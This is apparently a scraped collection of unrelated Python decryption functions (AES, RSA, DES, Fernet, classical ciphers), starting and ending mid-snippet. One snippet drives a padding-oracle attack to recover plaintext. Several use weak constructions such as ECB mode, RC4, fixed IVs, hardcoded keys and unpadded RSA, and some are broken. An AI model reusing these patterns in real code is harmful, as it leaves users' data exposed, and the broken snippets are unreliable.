self._private_key is None:\n raise Exception(\"invalid private key\")\n\n output = \"\"\n\n d = self._private_key[0]\n n = self._private_key[1]\n\n for i in xrange(len(ciphertext)):\n m = pow(ciphertext[i], d, n)\n output += int_to_string(m)\n return output", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def decrypt(self, key, msg, b64decode=True):\n if b64decode:\n msg = base64.b64decode(msg)\n iv = msg[:self.cipher.block_size]\n cipher = self.cipher.new(key, self.cipher.MODE_CBC, iv)\n\n padded = cipher.decrypt(msg[self.cipher.block_size:])\n l = ord(padded[-1:]) + 1\n plain = padded[:-l]\n return plain", "def decrypt(self, message):\n # message = message.upper().split()\n # message = \"\".join(message)\n # desalting the message to remove 5 characters blocks\n padding = input(\"Have you used 5 characters blocks? y/n \")\n if padding == \"y\":\n message = message.replace(\" \", \"\")\n message = self.desalt_random(message)\n message = \"\".join(message)\n\n message = message.upper()\n message_list = []\n for ch in message:\n message_list.append(self.main_dict[ch][0])\n\n # OTP Encryption / process the message with OTP\n otp = input(\"What is the OTP that was generated for you during \"\n \"encryption process?: \")\n otp = otp.upper()\n random_otp = []\n for ch in otp:\n random_otp.append(self.main_dict[ch][0])\n\n # If OTP is correct, decrypt the message with mod27\n if len(message_list) != len(random_otp):\n print(\"You typed a wrong OTP.\")\n return None\n else:\n math_list = []\n for i, item in enumerate(message_list):\n if message_list[i] >= random_otp[i]:\n x = message_list[i] - random_otp[i]\n for key, value in self.main_dict.items():\n if value[0] == x:\n math_list.append(key)\n else:\n for key, value in self.main_dict.items():\n if item == value[0]:\n x = value[1] - random_otp[i]\n for key, value in self.main_dict.items():\n if value[0] == x:\n math_list.append(key)\n return \"\".join(math_list)", "def decrypt(message: str) -> str:\n return \"\".join(REVERSE_DICT[char] for char in message.split())", "def decrypt(self, message):\r\n\r\n # Example string\r\n message = message.lower()\r\n # Everything we can encrypt\r\n SYMBOLS = \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\n for counter, key in enumerate(range(len(SYMBOLS))):\r\n # try again with each key attempt\r\n translated = \"\"\r\n\r\n for character in message:\r\n if character in SYMBOLS:\r\n symbolIndex = SYMBOLS.find(character)\r\n translatedIndex = symbolIndex - key\r\n\r\n # In the event of wraparound\r\n if translatedIndex < 0:\r\n translatedIndex += len(SYMBOLS)\r\n\r\n translated += SYMBOLS[translatedIndex]\r\n\r\n else:\r\n # Append the symbol without encrypting or decrypting\r\n translated += character\r\n\r\n # Output each attempt\r\n result = self.lc.checkLanguage(translated)\r\n if result:\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": True,\r\n \"Plaintext\": translated,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": f\"The rotation used is {counter}\",\r\n }\r\n # if none of them match English, return false!\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": None,\r\n }", "def decrypt(event=None): # event is passed by binders.\n msg = inputText.get(\"1.0\",tkinter.END)\n outText.delete('1.0', tkinter.END)\n\n decB64Msg = base64.decodestring(msg)\n\n f = open(myTmpDir + 'ct' + str(identity) + '.bin','wb')\n f.write(decB64Msg)\n f.close()\n\n os.popen(\"rsa.exe d \" + 
myTmpDir + \"ct\" + str(identity) + \".bin \" + myTmpDir + \"ptSender\" + str(identity) + \".bin\")\n\n with open(myTmpDir + \"ptSender\" + str(identity) + \".bin\", \"rb\") as f:\n readFile = f.read()\n # Convert to hex representation\n decMsg = bytes(readFile)\n\n # TODO: overwirite\n outText.insert(tkinter.END, decMsg)", "def decrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"decrypt.php\",msg)) as f:\n decryptedmessage = f.read().decode('utf-8',\"strict\")\n return decryptedmessage", "def decrypt(self, encrypted):\n\n encrypted = base64.b64decode(encrypted)\n IV = encrypted[:self.BLOCK_SIZE]\n aes = AES.new(self.key, AES.MODE_CBC, IV)\n return self._unpad(aes.decrypt(encrypted[self.BLOCK_SIZE:]))", "def decrypt_data(self, encrypted_data):\n raise NotImplementedError", "def _post_decrypt_checks(self, aad, plaintext, protected_message, request_id):", "def decrypt(self):\n # Grab the initialization vector from the front of the cipher-text\n iv = self.ciphertext[:AES.block_size]\n # Create a new AES object in Cipher Block Chaining mode\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return cipher.decrypt(self.ciphertext)[AES.block_size:].rstrip().decode(\"utf-8\"), iv", "def decrypt(self, ciphertext: str) -> str:\n\n return self.run(ciphertext, Cryptography.DECRYPT)", "def _decrypt(self):\n self._outfile = os.path.join(self.dest, self.plain_file)\n self._infile = self.encrypted_file\n self._log.info(\"Decrypting file '%s' to '%s'\", self.encrypted_file, self._outfile)\n with open(self.encrypted_file, \"rb\") as enc_file:\n openssl(\n \"enc\",\n \"-aes-256-cbc\",\n \"-d\",\n \"-pass\",\n \"file:{secret}\".format(secret=self.secret.keyfile),\n _in=enc_file,\n _out=self._outfile,\n )\n self._log.info(\"File '%s' decrypted to '%s'\", self.encrypted_file, self._outfile)\n return True", "def decrypt_text_file(self):\r\n\t\t#Ensures that the file has something that can be decrypted.\r\n\t\tfile_contains_message = True\r\n\t\twhile file_contains_message:\r\n\t\t\tfile_exists = True\r\n\t\t\t#Checks to see if the file exists.\r\n\t\t\twhile file_exists:\r\n\t\t\t\tself.text_file_name = input(\"Please enter the name of the text file you wish to decrypt in format |file_name.txt|.--> \")\r\n\t\t\t\tif \".txt\" in self.text_file_name:\r\n\t\t\t\t\tfile_exists = Doc_Control().check_for_file(self.text_file_name)\r\n\t\t\t\telse: \r\n\t\t\t\t\tcontinue\r\n\t\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\t\twhile True: \r\n\t\t\t\tself.message = Doc_Control().open_file(self.text_file_name)\r\n\t\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\t\tfile_contains_message = False\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(\"Your file does not contain an encryptable message.\")\r\n\t\t\t\t\tbreak\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tself.output_file = Doc_Control().assign_output_file()\r\n\t\toutput_file_obj = open(self.output_file, 'w')\r\n\t\toutput_file_obj.write(self.my_code)\r\n\t\toutput_file_obj.close()\t\t\r\n\t\tprint(\"\\nYour file has been decrypted.\")", "def decrypt_string(self, encrypted_string):\n return self.fernet_instance.decrypt(encrypted_string.encode('utf-8')).decode('utf-8')", "def decrypt(self, user_input):\n # extract the message and keyword\n message = user_input[0]\n keyword = user_input[1]\n\n # generate 
decryption key\n cipher_key = self.__generate_key(keyword, \"decrypt\")\n\n # process text\n return self.__process_text(cipher_key, message)", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def decrypt_message(message: bytes, receiver_private_key: RsaKey) -> bytes:\n iv = message[:IV_LEN]\n enc_aes_key = message[IV_LEN:IV_LEN + receiver_private_key.size_in_bytes()] # Assume encryption has been done with same key size\n enc_message = message[IV_LEN + receiver_private_key.size_in_bytes():]\n\n cipher_rsa = PKCS1_OAEP.new(receiver_private_key)\n aes_key = cipher_rsa.decrypt(enc_aes_key)\n\n cipher_aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(cipher_aes.decrypt(enc_message), AES.block_size) # Padding have to be removed", "def decrypt_faces(msg, nkey=key):\n newmsg = msg[:-20]\n obj = DES.new(nkey, DES.MODE_ECB)\n return obj.decrypt(newmsg)", "def _decrypt_string(self, event):\n _LOGGER.debug(\"Hub: Decrypt String: Original: %s\", str(event.encrypted_content))\n resmsg = self._decrypter.decrypt(unhexlify(event.encrypted_content)).decode(\n encoding=\"UTF-8\", errors=\"replace\"\n )\n _LOGGER.debug(\"Hub: Decrypt String: Decrypted: %s\", resmsg)\n event.parse_decrypted(resmsg)", "def decrypt(self, ciphertext):\n text = []\n # ciphertext = ciphertext.upper()\n for char in ciphertext:\n try:\n key = math_utils.mult_mod_inv(self.a, len(self.characters)) * (self.characters.index(char) - self.b) % len(self.characters)\n # If character is not in set for cipher,\n # directly append it without transformation\n except ValueError:\n text.append(char)\n else:\n text.append(self.characters[key])\n return ''.join(text)", "def decrypt():\n request_data = request.get_json()\n\n if ('ciphertext' in request_data and\n 'tag' in request_data and\n 'enc_session_key' in request_data and\n 'nonce' in request_data):\n\n try:\n for key in request_data.keys():\n request_data[key] = b64decode(request_data[key])\n except binascii.Error:\n return Response(\n json.dumps(\n {\n 'error': 'Malformed payload'\n }\n ),\n 400,\n mimetype='application/json'\n )\n\n encryption = Decryption(request_data['enc_session_key'], request_data['nonce'])\n try:\n message = encryption.decrypt(\n (request_data['ciphertext'], request_data['tag'])\n ).decode()\n except ValueError as error:\n return Response(\n json.dumps(\n {\n 'error': f'Failed to decrypt the message due to the error: [{error}]'\n }\n ),\n 400,\n mimetype='application/json'\n )\n\n return jsonify({'message': message}), 200\n\n return Response(\n json.dumps(\n {\n 'error': (\n 'Tag / Ciphertext / Nonce / Encrypted Session Key'\n ' missing in the request body'\n )\n }\n ),\n 400,\n mimetype='application/json'\n )", "def decrypt(self, key, encrypted):\n output = []\n padded_key = padd_key(key, encrypted)\n for i in range(len(encrypted)):\n dec_ascii = (ord(encrypted[i]) - ord(padded_key[i])) % 256\n output.append(chr(dec_ascii))\n return ''.join(output)", "def decrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n decrypted = aes.decrypt(text)\r\n return decrypted", "def decrypt(ciphertext: str) -> Iterable:\n return simplesubstitution.decrypt(KEY, ciphertext)", "def decrypt(self, message):\n message = base64.b64decode(message)\n initialization_vector = message[:self._block_size]\n cipher = AES.new(self._key, AES.MODE_CBC, initialization_vector)\n raw_message = cipher.decrypt(message[self._block_size:])\n return self._remove_padding(raw_message).decode('utf-8')", "def ecb_decrypt(self, encrypted_data, color):\n msg = 
b''\n for d in encrypted_data:\n encoded_bytes = d[0] + d[1]\n encoded_int = self.bytes_to_int(encoded_bytes)\n decoded_int = self.power(encoded_int, self.private_key, self.N)\n decoded_byte = self.int_to_bytes(decoded_int, len(d[0]))\n msg += decoded_byte\n return msg", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def decipher(s, key): # s = message\n return decipher_raw(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decrypt(self, ciphertext, key):\n iv = ciphertext[:AES.block_size]\n cipher = AES.new(key, AES.MODE_CBC, iv, segment_size=64)\n plaintext = cipher.decrypt(ciphertext[AES.block_size:])\n return self.pkcs7_unpad(plaintext)", "def decrypt_symmetric(self, ciphertext):\n from google.cloud import kms_v1\n\n # Creates an API client for the KMS API.\n client = kms_v1.KeyManagementServiceClient()\n\n # The resource name of the CryptoKey.\n name = client.crypto_key_path_path(self.project_id, self.location_id, self.key_ring_id,\n self.crypto_key_id)\n # Use the KMS API to decrypt the data.\n response = client.decrypt(name, ciphertext)\n return response.plaintext", "def decipher2(s, key): # s = message\n return decipher_raw2(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt(self, data):\n if not data:\n return ''\n data = self._crypt(data, self.DECRYPT)\n return self._unpad_data(data)", "def decrypt_message(self, env_key, data):\n\n if not env_key or not data:\n raise Exception('Arguments missing.')\n\n key = RSA.importKey(self.private_key)\n try:\n env_key = unquote(env_key).decode('utf8')\n data = unquote(data).decode('utf8')\n except AttributeError:\n # Python 3 compatible\n env_key = unquote(env_key)\n data = unquote(data)\n\n try:\n env_key = base64.b64decode(env_key)\n data = base64.b64decode(data)\n \n cipher = PKCS1_v1_5.new(key)\n\n sentinel = []\n session_key = cipher.decrypt(env_key, sentinel)\n\n rc4_cipher = ARC4.new(session_key)\n\n xml_data = rc4_cipher.decrypt(data)\n\n # TODO: add xml validation\n # schema_root = etree.XML(xml_data)\n # schema = etree.XMLSchema(schema_root)\n # parser = etree.XMLParser(schema=schema)\n\n return xml_data\n except Exception as e:\n if self.developement:\n exception(e)\n\n raise Exception('Could not decrypt message.')", "def _decrypt(data):\n cipher = AES.new(bytes(_AES_KEY), AES.MODE_CBC, bytes(_AES_IV))\n return cipher.decrypt(data)", "def decrypt(message, key):\r\n\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n new_st = ''\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0:\r\n new_st += alpha_lower[alpha_lower.index(x) - key]\r\n if 
alpha_upper.count(x) != 0:\r\n new_st += alpha_upper[alpha_upper.index(x) - key]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n\r\n # --- CODE ENDS HERE\r", "def Decrypt(self, data):\n\n data = base64.b64decode(data)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n solved = \"\"\n try:\n solved = es.decrypt(data)\n except ValueError:\n stdout.write(\"Error, corrupted file.\\n\\n\")\n return \"%errorpass:1234123412341234%\"\n\n return solved", "def decrypt(ciphertext, key, iv):\n cipher = AES.new(key, AES.MODE_CFB, iv)\n msg = cipher.decrypt(ciphertext)\n return msg", "def decrypt_message(data,symetric_key,private_key):\n\tif type(data) == str or type(data) == bytes:\n\t\tdata = json.loads(data)\n\ttyp = data['type']\n\tnonce = data['nonce'].encode(\"iso-8859-1\")\n\tmessage = data['message'].encode(\"iso-8859-1\")\n\tnonce, *_ = decrypt(private_key,nonce)\n\tmessage = AESCCM(symetric_key).decrypt(nonce,message,None)\n\tmessage ={'type':typ,'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\treturn message", "def decrypt(self, encrypted: str) -> str: # type: ignore\n passphrase = self.passphrase\n encrypted = base64.b64decode(encrypted) # type: ignore\n assert encrypted[0:8] == b\"Salted__\"\n salt = encrypted[8:16]\n key_iv = self.bytes_to_key(passphrase.encode(), salt, 32 + 16)\n key = key_iv[:32]\n iv = key_iv[32:]\n aes = AES.new(key, AES.MODE_CBC, iv)\n try:\n return self.unpad(aes.decrypt(encrypted[16:])).decode() # type: ignore\n except UnicodeDecodeError:\n raise ValueError(\"Wrong passphrase\")", "def decrypt():\n plaintext = \"\"\n i = 0\n while i < len(ciphertext):\n if i%2==1:\n try:\n plaintext += key[ ciphertext[i-1]+ciphertext[i] ]\n except KeyError:\n plaintext += ciphertext[i-1]+ciphertext[i]\n i += 1\n return plaintext", "def decrypt(self, cypher):\n\n if self.crypt_private == \"\":\n raise ValueError(\"Error decrypting: No private encryption key found for {}\".format(self))\n\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def decrypt_msg(msg, query, padding, iv=None, blocksize=16, threads=1):\n # Input validation\n msg = bytearray(msg)\n assert len(msg) % blocksize == 0\n if iv is not None:\n iv = bytearray(iv)\n assert len(iv) == blocksize\n msg = iv + msg\n else:\n assert len(msg) > blocksize\n\n # Split into \"iv\", ciphertext pairs\n blocks = chop(bytearray(msg), blocksize)\n pairs = zip(blocks, blocks[1:])\n\n # Decrypt every pair seperately (to minimize query size)\n logger.info('Decrypting %d block[s] of data using a padding oracle' % len(pairs))\n out = bytearray()\n for n, (iv, block) in enumerate(pairs):\n logger.info('Decrypting block %d' % n)\n out += decrypt(iv, block, query, padding, threads)\n logger.info('Decrypted block: %s' % hex(out[-blocksize:]))\n return out", "def decrypt_message(self):\n token = bytes(self.args['token'].encode('utf-8'))\n message = base64.urlsafe_b64decode(token)\n\n # Check that the message is valid (HMAC-SHA1 checking).\n if not self.check_hmac_signature(message):\n raise TokenAuthenticationError('HMAC authentication failed')\n\n init_vector = message[:16]\n enc_message = message[16:-20]\n\n aes = AES.new(bytes(self.settings['aes_key'].encode('utf-8')), AES.MODE_CBC, init_vector)\n message = aes.decrypt(enc_message).decode('utf-8')\n\n # Get the login data in an easy-to-use tuple.\n try:\n login_data = self.get_login_data(message)\n except AttributeError:\n # Regex failed, so data was not valid.\n raise 
TokenAuthenticationError('Message does not contain valid login data')\n\n name = login_data[2].strip()\n first_name = name.split(' ').pop(0)\n parts = name.split(' ')\n parts.pop(0)\n last_name = \" \".join(parts)\n email = login_data[3].strip()\n email = ''.join(x for x in email if x in string.printable)\n\n data = {\n 'timestamp': login_data[0],\n 'remote_id': email,\n 'email': email,\n 'first_name': first_name,\n 'last_name': last_name,\n 'username': email\n }\n\n return data", "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def decryptMessage():\n exponents = [2, 1, 0]\n encryptedMessage = input(\"Please enter the RSA encrypted message: \\n\")\n messageSplit = encryptedMessage.split(\" \")\n print(\"\")\n for c in messageSplit:\n d = modInverse(PUBLIC_KEY[\"e\"], phi(PUBLIC_KEY[\"n\"]))\n p = (int(c) ** d) % PUBLIC_KEY[\"n\"]\n for e in exponents:\n letter = math.trunc((p/pow(26, e)) % 26)\n print(ALPHABET[letter], end=\"\")\n print(\" \", end=\"\")\n print(\"\")", "def decrypt(self, in_, out):\n try:\n # Bytes read from in will be decrypted\n \n out.write(pyDes.des.decrypt(in_.read()))\n # Read in the decrypted bytes and write the cleartext to out\n out.close()\n except Exception as e:\n print e\n pass", "def AES_decrypt(ciphertext: bytes) -> Text:\n text = b64decode(ciphertext)\n cipher = AES.new(secret_key, mode, IV)\n return Padding.unpad(cipher.decrypt(text), bs).decode('utf-8')", "def decrypt(message):\r\n\r\n assert isinstance(message, str), 'Only encrypt strings only!'\r\n decrypted_message = ''\r\n\r\n final_dot = False\r\n final_question = False\r\n final_comma = False\r\n final_dot_counter = 0\r\n final_question_counter = 0\r\n final_comma_counter = 0\r\n\r\n while message[-1] == '.':\r\n message = message[:-1]\r\n final_dot = True\r\n final_dot_counter += 1\r\n\r\n while message[-1] == '?':\r\n message = message[:-1]\r\n final_question = True\r\n final_question_counter += 1\r\n\r\n while message[-1] == ',':\r\n message = message[:-1]\r\n final_comma = True\r\n final_comma_counter += 1\r\n\r\n\r\n for message_word in message.split():\r\n file = open(\"words.txt\", \"r\")\r\n checked = False\r\n middle_dot = False\r\n middle_question = False\r\n middle_comma = False\r\n middle_dot_counter = 0\r\n middle_question_counter = 0\r\n middle_comma_counter = 0\r\n\r\n while message_word[-1] == '.':\r\n message_word = message_word[:-1]\r\n middle_dot = True\r\n middle_dot_counter += 1\r\n\r\n while message_word[-1] == '?':\r\n message_word = message_word[:-1]\r\n middle_question = True\r\n middle_question_counter += 1\r\n\r\n\r\n while message_word[-1] == ',':\r\n message_word = message_word[:-1]\r\n middle_comma = True\r\n middle_comma_counter += 1\r\n\r\n for line in file:\r\n file_word = line.split()[2]\r\n if message_word == file_word:\r\n decrypted_message += line.split()[0] + \" \"\r\n if middle_dot == True: decrypted_message = decrypted_message[:-1] + \".\" * middle_dot_counter + \" \"\r\n if middle_question == True: decrypted_message = decrypted_message[:-1] + \"?\" * middle_question_counter + \" \"\r\n if middle_comma == True: decrypted_message = decrypted_message[:-1] + \",\" * middle_comma_counter + \" \"\r\n checked = True\r\n break\r\n\r\n if checked != True:\r\n decrypted_message += message_word + \" \"\r\n if middle_dot == True: decrypted_message = decrypted_message[:-1] + \".\" * middle_dot_counter + \" \"\r\n if middle_question == True: decrypted_message = decrypted_message[:-1] + \"?\" * middle_question_counter + \" \"\r\n if 
middle_comma == True: decrypted_message = decrypted_message[:-1] + \",\" * middle_comma_counter + \" \"\r\n file.close()\r\n\r\n decrypted_message = decrypted_message[:-1]\r\n if final_dot == True:\r\n decrypted_message += '.'*final_dot_counter\r\n elif final_question == True:\r\n decrypted_message += '?'*final_question_counter\r\n elif final_comma == True:\r\n decrypted_message += ','*final_comma_counter\r\n\r\n\r\n first_num = int(decrypted_message[0]) + 1\r\n third_num = int(decrypted_message[2])\r\n\r\n\r\n decrypted_message = decrypted_message.split(' ', first_num)[first_num]\r\n decrypted_message = ' '.join(decrypted_message.split()[:-third_num])\r\n\r\n return decrypted_message", "def decrypt(self, cypher):\n\n cypher = b64decode(cypher)\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def decrypt(self, value):\n return self._execute(value, task='decrypt')", "def decrypt(self, message: bytearray) -> bytearray:\n return self.__PRGA(message)", "def decrypt(ciphertext):\n base_decode = {'16': base64.b16decode,\n '32': base64.b32decode, '64': base64.b64decode}\n cleartext = ciphertext+''\n for i in range(encrypt_times):\n cleartext = base_decode[get_base(cleartext)](cleartext)\n return cleartext", "def decrypt(self, text):\n\t\tif self.offsets != self.start_off:\n\t\t\traise Exception(\"Current offset != starting offset. Use the reset\"+\\\n\t\t\t\t\t\t\t\" method before decrypting.\")\n\t\treturn self.encrypt(text)", "def decrypt_caesar(ciphertext):\n return ''.join([cipher_to_plain[old] for old in ciphertext.upper()])", "def do_android_decryption(self):\r\n self.aes_decryption_key = self.extract_aes_key()\r\n self.decrypt_device_file()\r\n # join is optimized and does not cause O(n^2) total memory copies.\r\n self.decrypted_file = b\"\\n\".join(self.good_lines)", "def decrypt(cls, ciphertext_and_tag, aad, key, iv):", "def decrypt(self, encrypted_token: bytes) -> bytes:\n return None", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def decipher(self):\n plaintext = \"\"\n for ct, key_char in zip(self.text, self.key):\n char_index = self.char_block.rows[key_char].index(ct)\n plaintext += self.char_block.alphabet[char_index]\n print(plaintext)", "def decode(self, data):\n return self.__cipher.decrypt(data)", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def decrypt(\r\n key: bytes,\r\n cipher_text: bytes,\r\n) -> str:\r\n block_size = 16\r\n iv = cipher_text[:block_size]\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plain_text = cipher.decrypt(cipher_text[block_size:]).decode('utf-8')\r\n return _unpad(plain_text)", "def _decrypt(self, data, key):\n seed1 = key\n seed2 = 0xEEEEEEEE\n result = BytesIO()\n\n for i in range(len(data) // 4):\n seed2 += self.encryption_table[0x400 + (seed1 & 0xFF)]\n seed2 &= 0xFFFFFFFF\n value = struct.unpack(\"<I\", data[i*4:i*4+4])[0]\n value = (value ^ (seed1 + seed2)) & 0xFFFFFFFF\n\n seed1 = ((~seed1 << 0x15) + 0x11111111) | (seed1 >> 0x0B)\n seed1 &= 0xFFFFFFFF\n seed2 = value + seed2 + (seed2 << 5) + 3 & 
0xFFFFFFFF\n\n result.write(struct.pack(\"<I\", value))\n\n return result.getvalue()", "def decrypt(ciphertext, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\n\tif not isPython2():\n\t\tif isString(ciphertext):\n\t\t\tciphertext = ciphertext.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\t\t\n\tiv = ciphertext[:AES.block_size]\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tplaintext = cipher.decrypt(ciphertext[AES.block_size:])\n\treturn plaintext", "def decrypt(self, msg):\n\n if type(msg) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n return self.gpg.decrypt(msg).data", "def decrypt(phrase, offset):\n return encrypt(phrase, 26 - offset) #Encrypting then decrypting by the same number will in effect encrypt by 26, looping back to the starting letters", "def do_ios_decryption(self):\r\n try:\r\n self.aes_decryption_key = self.extract_aes_key()\r\n except DecryptionKeyInvalidError:\r\n self.aes_decryption_key = self.get_backup_encryption_key()\r\n self.used_ios_decryption_key_cache = True\r\n \r\n self.decrypt_device_file()\r\n # join is optimized and does not cause O(n^2) total memory copies.\r\n self.decrypted_file = b\"\\n\".join(self.good_lines)", "def decrypt(self, string):\n return self.__Cipher(self.OP_DECRYPT).update(string)", "def decrypt(ciphertext):\n # AES decrypt\n iv = ciphertext[:16]\n ciphertext = ciphertext[16:]\n aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(aes.decrypt(ciphertext))", "def decrypt(self, enc, use_base64=True, decode_text=True):\n if use_base64:\n enc = base64.b64decode(enc)\n\n decryptor = self.cipher.decryptor()\n raw = self._unpad(decryptor.update(enc) + decryptor.finalize())\n return raw.decode(\"utf-8\") if decode_text else raw", "def decrypt_block(self, ciphertext):\n assert len(ciphertext) == 16\n\n cipher_state = bytes2matrix(ciphertext)\n\n add_round_key(cipher_state, self._key_matrices[-1])\n inv_shift_rows(cipher_state)\n inv_sub_bytes(cipher_state)\n\n for i in range(self.n_rounds - 1, 0, -1):\n add_round_key(cipher_state, self._key_matrices[i])\n inv_mix_columns(cipher_state)\n inv_shift_rows(cipher_state)\n inv_sub_bytes(cipher_state)\n \n add_round_key(cipher_state, self._key_matrices[0])\n\n return matrix2bytes(cipher_state)", "def Private(self):\n self.Send(self.EncryptString('private\\n'))\n print self.DecryptString(self.Recv(4096))\n print self.DecryptString(self.Recv(4096))", "def decrypt_str(message):\n filename = f'/tmp/{get_temp_filename()}'\n filename_encrypted = f'{filename}.pem'\n filename_plain = f'{filename}.plain'\n pem_file = open(filename_encrypted, 'w')\n pem_file.write(message)\n pem_file.close()\n cmd = [\n \"openssl\",\n \"cms\",\n \"-decrypt\",\n \"-inform\", \"PEM\",\n \"-in\", filename_encrypted,\n \"-inkey\", server_key_files[\"key\"],\n \"-recip\", server_key_files[\"crt\"],\n \"-out\", filename_plain\n ]\n res_text = \"\"\n try:\n exec_cmd(cmd)\n with open(filename_plain, \"r\") as plain:\n res_text = plain.read()\n plain.close()\n os.unlink(filename_plain)\n except (OSError, subprocess.CalledProcessError) as err:\n logging.error(\"decrypt_str failed: %s\", err)\n finally:\n os.unlink(filename_encrypted)\n\n return res_text", "def decrypt(self, buffer):\n try:\n ct = base64.b64decode(buffer)\n except:\n print('f a i l')\n return bytes('fail')\n\n cipher = AES.new(self.psk, AES.MODE_GCM, FIXED_IV)\n pt = unpad(cipher.decrypt(ct), AES.block_size)\n return pt", "def decrypt(self, input, 
iv) :\n pass", "def doDecode(self):\n raise CipherError(\"override this funct and return the decoded msg\")", "def decrypt(self, enc):\n\n enc = base64.b64decode(enc)\n iv = enc[:AES.block_size]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')", "def _decrypt_encrypted_data(encryption_algorithm_info, encrypted_content, password):\n\n decrypt_func = crypto_funcs[encryption_algorithm_info.encryption_cipher]\n\n # Modern, PKCS#5 PBES2-based encryption\n if encryption_algorithm_info.kdf == 'pbkdf2':\n\n if encryption_algorithm_info.encryption_cipher == 'rc5':\n raise ValueError(pretty_message(\n '''\n PBES2 encryption scheme utilizing RC5 encryption is not supported\n '''\n ))\n\n enc_key = pbkdf2(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length\n )\n enc_iv = encryption_algorithm_info.encryption_iv\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pbkdf1':\n derived_output = pbkdf1(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length + 8\n )\n enc_key = derived_output[0:8]\n enc_iv = derived_output[8:16]\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pkcs12_kdf':\n enc_key = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length,\n 1 # ID 1 is for generating a key\n )\n\n # Since RC4 is a stream cipher, we don't use an IV\n if encryption_algorithm_info.encryption_cipher == 'rc4':\n plaintext = decrypt_func(enc_key, encrypted_content)\n\n else:\n enc_iv = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.encryption_block_size,\n 2 # ID 2 is for generating an IV\n )\n plaintext = decrypt_func(enc_key, encrypted_content, 